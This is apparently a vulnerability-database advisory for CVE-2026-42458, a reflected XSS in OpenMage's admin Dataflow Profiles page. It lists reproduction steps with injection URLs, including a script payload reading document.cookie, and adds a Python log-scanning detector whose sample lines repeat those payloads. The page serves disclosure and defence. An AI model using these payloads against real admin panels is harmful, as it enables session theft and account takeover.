CVE-2026-42458 is a low severity vulnerability with a CVSS score of 0.0. No known exploits currently, and patches are available.
Very low probability of exploitation
EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.
A reflected XSS vulnerability was found in the admin panel under System -> Import/Export -> Dataflow - Profiles.
Log in to the admin panel.
Go to System -> Import/Export -> Dataflow - Profiles.
Select the profile direction as Import.
Click on Import Customers.
Upload the file.
File Link: customer_20260212_204335.csv
Go back to Run profile.
Select the uploaded file and click on Run in Popup.
The resulting URL looks like this:
https://demo-admin.openmage.org/index.php/admin/system_convert_gui/run/id/6/key/40dbbb2e93f45f0463c57ff733352f4f/files/import-20260215151125-1_customer_20260212_204335.csv/
The filename from the URL is reflected in the HTML of the response.
Inject an HTML tag in place of the filename and observe:
https://demo-admin.openmage.org/index.php/admin/system_convert_gui/run/id/6/key/40dbbb2e93f45f0463c57ff733352f4f/files/"><h3>hacked</h3>/
The injected tag is rendered in the page.
Proceed to XSS:
https://demo-admin.openmage.org/index.php/admin/system_convert_gui/run/id/6/key/40dbbb2e93f45f0463c57ff733352f4f/files/%3CScRiPt%20%3Eprompt(document.cookie)%3C%2FScRiPt%3E
Impact: cookie stealing, JS defacement, and more.
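A detection-side check for the reflection described above, as an added example (not from the advisory or from OpenMage): it scans access-log lines for run-profile requests whose `files` path value, once percent-decoded, contains anything other than file-name characters. The log format, the allowed character set and the `KEY` placeholder are assumptions, and the sample lines are constructed from the URLs on this page.

```python
import re
from urllib.parse import unquote

# Route from the URLs on this page; parameters follow as /name/value/ path pairs.
ROUTE = "/admin/system_convert_gui/run/"
# Assumption: legitimate import file names contain only these characters.
SAFE_NAME = re.compile(r"[A-Za-z0-9._-]+")
# Assumption: common/combined access-log format with the request line in quotes.
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def files_value(path):
    """Return the decoded 'files' value of a run-profile request, else None."""
    path = path.split("?", 1)[0]
    if ROUTE not in path:
        return None
    match = re.search(r"(?:^|/)files/(.*)$", path.split(ROUTE, 1)[1])
    if match is None:
        return None
    value = match.group(1)
    for _ in range(3):  # normalise percent-encoding, bounded number of rounds
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.rstrip("/")

def is_suspicious(path):
    """True when the reflected file name holds anything but file-name characters."""
    name = files_value(path)
    return bool(name) and SAFE_NAME.fullmatch(name) is None

def flag_lines(log_lines):
    """Return the request paths of access-log lines that should be reviewed."""
    hits = []
    for line in log_lines:
        match = REQUEST.search(line)
        if match and is_suspicious(match.group(1)):
            hits.append(match.group(1))
    return hits

# Constructed sample lines (KEY stands in for the admin URL key).
BASE = "/index.php/admin/system_convert_gui/run/id/6/key/KEY/files/"
SAMPLE_LOG = [
    f'192.0.2.10 - - [15/Feb/2026:15:11:25 +0000] "GET {BASE}import-20260215151125-1_customer_20260212_204335.csv/ HTTP/1.1" 200 5120',
    f'192.0.2.10 - - [15/Feb/2026:15:12:01 +0000] "GET {BASE}%22%3E%3Ch3%3Ehacked%3C/h3%3E/ HTTP/1.1" 200 5188',
    f'192.0.2.10 - - [15/Feb/2026:15:12:40 +0000] "GET {BASE}%3CScRiPt%20%3Eprompt(document.cookie)%3C%2FScRiPt%3E HTTP/1.1" 200 5201',
    '192.0.2.10 - - [15/Feb/2026:15:13:02 +0000] "GET /index.php/admin/dashboard/ HTTP/1.1" 200 9000',
]
```

Calling `flag_lines(SAMPLE_LOG)` returns the two requests carrying markup in the `files` value and leaves the legitimate import run and the dashboard request alone.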
Please cite this page when referencing data from Strobes VI. Proper attribution helps support our vulnerability intelligence research.